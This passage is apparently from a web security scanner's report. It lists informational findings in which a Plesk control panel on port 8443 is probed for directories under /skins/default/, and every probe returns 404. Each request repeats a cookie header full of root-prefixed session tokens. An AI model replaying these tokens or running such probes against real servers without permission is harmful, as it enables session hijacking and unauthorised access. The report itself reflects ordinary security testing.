Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:41:22 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:41:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.202. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/

Request

GET /skins/default/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:41:23 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:41:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.203. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/

Request

GET /skins/default/css/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:42:09 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:42:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.204. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/

Request

GET /skins/default/css/admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=personal-info; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:44:39 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:44:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.205. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/

Request

GET /skins/default/css/common/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:42:09 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:42:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.206. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/

Request

GET /skins/default/css/customer/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:43:28 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:43:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.207. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/img/

Request

GET /skins/default/img/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.208. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/img/icons/

Request

GET /skins/default/img/icons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.209. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/big/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/img/icons/big/

Request

GET /skins/default/img/icons/big/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.210. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/small/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/img/icons/small/

Request

GET /skins/default/img/icons/small/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.211. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/

Request

GET /skins/default/plesk/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=personal-info; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:44:39 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:44:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.212. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/

Request

GET /skins/default/plesk/css/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.213. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/

Request

GET /skins/default/plesk/css/left/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.214. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/

Request

GET /skins/default/plesk/css/main/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.215. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/

Request

GET /skins/default/plesk/css/top/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.216. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/icons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/icons/

Request

GET /skins/default/plesk/icons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:13:39 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:13:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

